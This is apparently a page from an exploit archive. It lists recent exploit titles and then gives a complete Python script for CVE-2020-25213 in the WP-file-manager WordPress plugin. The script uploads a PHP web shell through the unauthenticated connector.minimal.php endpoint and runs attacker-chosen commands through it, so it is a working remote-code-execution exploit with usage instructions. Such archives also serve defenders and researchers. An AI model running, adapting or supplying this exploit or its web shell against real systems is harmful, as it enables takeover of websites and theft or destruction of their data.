
39 changes to exploits/shellcodes/ghdb ProLink PRS1841 PLDT Home fiber - Default Password Nacos 2.0.3 - Access Control vulnerability sudo 1.8.0 to 1.9.12p1 - Privilege Escalation sleuthkit 4.11.1 - Command Injection Active eCommerce CMS 6.5.0 - Stored Cross-Site Scripting (XSS) ManageEngin AMP 4.3.0 - File-path-traversal SQL Monitor 12.1.31.893 - Cross-Site Scripting (XSS) AmazCart CMS 3.4 - Cross-Site-Scripting (XSS) Art Gallery Management System Project v1.0 - Reflected Cross-Site Scripting (XSS) Art Gallery Management System Project v1.0 - SQL Injection (sqli) authenticated Art Gallery Management System Project v1.0 - SQL Injection (sqli) Unauthenticated ChiKoi v1.0 - SQL Injection ERPGo SaaS 3.9 - CSV Injection GLPI Cartography Plugin v6.0.0 - Unauthenticated Remote Code Execution (RCE) GLPI 4.0.2 - Unauthenticated Local File Inclusion on Manageentities plugin GLPI Activity v3.1.0 - Authenticated Local File Inclusion on Activity plugin GLPI Glpiinventory v1.0.1 - Unauthenticated Local File Inclusion GLPI v10.0.1 - Unauthenticated Sensitive Data Exposure GLPI v10.0.2 - SQL Injection (Authentication Depends on Configuration) Metform Elementor Contact Form Builder v3.1.2 - Unauthenticated Stored Cross-Site Scripting (XSS) MyBB 1.8.32 - Remote Code Execution (RCE) (Authenticated) Paid Memberships Pro v2.9.8 (WordPress Plugin) - Unauthenticated SQL Injection pimCore v5.4.18-skeleton - Sensitive Cookie with Improper SameSite Attribute Prizm Content Connect v10.5.1030.8315 - XXE SLIMSV 9.5.2 - Cross-Site Scripting (XSS) WP-file-manager v6.9 - Unauthenticated Arbitrary File Upload leading to RCE Zstore 6.5.4 - Reflected Cross-Site Scripting (XSS) Roxy WI v6.1.0.0 - Improper Authentication Control Roxy WI v6.1.0.0 - Unauthenticated Remote Code Execution (RCE) Roxy WI v6.1.1.0 - Unauthenticated Remote Code Execution (RCE) via ssl_cert Upload Solaris 10 libXm - Buffer overflow Local privilege escalation Chromacam 4.0.3.0 - PsyFrameGrabberService Unquoted Service Path Grand Theft Auto III/Vice City Skin File v1.1 - Buffer Overflow HotKey Clipboard 2.1.0.6 - Privilege Escalation Unquoted Service Path Microsoft Exchange Active Directory Topology 15.02.1118.007 - 'Service MSExchangeADTopology' Unquoted Service Path Windows 11 10.0.22000 - Backup service Privilege Escalation Windows/x86 - Create Administrator User / Dynamic PEB & EDT method null-free Shellcode (373 bytes)
73 lines
No EOL
1.9 KiB
Python
Executable file
73 lines
No EOL
1.9 KiB
Python
Executable file
#!/usr/bin/env
|
|
|
|
# Exploit Title: WP-file-manager v6.9 - Unauthenticated Arbitrary File Upload leading to RCE
|
|
# Date: [ 22-01-2023 ]
|
|
# Exploit Author: [BLY]
|
|
# Vendor Homepage: [https://wpscan.com/vulnerability/10389]
|
|
# Version: [ File Manager plugin 6.0-6.9]
|
|
# Tested on: [ Debian ]
|
|
# CVE : [ CVE-2020-25213 ]
|
|
|
|
import sys,signal,time,requests
|
|
from bs4 import BeautifulSoup
|
|
#from pprint import pprint
|
|
|
|
def handler(sig,frame):
|
|
print ("[!]Saliendo")
|
|
sys.exit(1)
|
|
|
|
signal.signal(signal.SIGINT,handler)
|
|
|
|
def commandexec(command):
|
|
|
|
exec_url = url+"/wp-content/plugins/wp-file-manager/lib/php/../files/shell.php"
|
|
params = {
|
|
"cmd":command
|
|
}
|
|
|
|
r=requests.get(exec_url,params=params)
|
|
|
|
soup = BeautifulSoup(r.text, 'html.parser')
|
|
text = soup.get_text()
|
|
|
|
print (text)
|
|
def exploit():
|
|
|
|
global url
|
|
|
|
url = sys.argv[1]
|
|
command = sys.argv[2]
|
|
upload_url = url+"/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php"
|
|
|
|
headers = {
|
|
'content-type': "multipart/form-data; boundary=----WebKitFormBoundaryvToPIGAB0m9SB1Ww",
|
|
'Connection': "close"
|
|
}
|
|
|
|
payload = "------WebKitFormBoundaryvToPIGAB0m9SB1Ww\r\nContent-Disposition: form-data; name=\"cmd\"\r\n\r\nupload\r\n------WebKitFormBoundaryvToPIGAB0m9SB1Ww\r\nContent-Disposition: form-data; name=\"target\"\r\n\r\nl1_Lw\r\n------WebKitFormBoundaryvToPIGAB0m9SB1Ww\r\nContent-Disposition: form-data; name=\"upload[]\"; filename=\"shell.php\"\r\nContent-Type: application/x-php\r\n\r\n<?php echo \"<pre>\" . shell_exec($_REQUEST['cmd']) . \"</pre>\"; ?>\r\n------WebKitFormBoundaryvToPIGAB0m9SB1Ww--"
|
|
|
|
try:
|
|
r=requests.post(upload_url,data=payload,headers=headers)
|
|
#pprint(r.json())
|
|
commandexec(command)
|
|
except:
|
|
print("[!] Algo ha salido mal...")
|
|
|
|
|
|
|
|
|
|
def help():
|
|
|
|
print ("\n[*] Uso: python3",sys.argv[0],"\"url\" \"comando\"")
|
|
print ("[!] Ejemplo: python3",sys.argv[0],"http://wordpress.local/ id")
|
|
|
|
|
|
|
|
|
|
if __name__ == '__main__':
|
|
|
|
if len(sys.argv) != 3:
|
|
help()
|
|
|
|
else:
|
|
exploit() |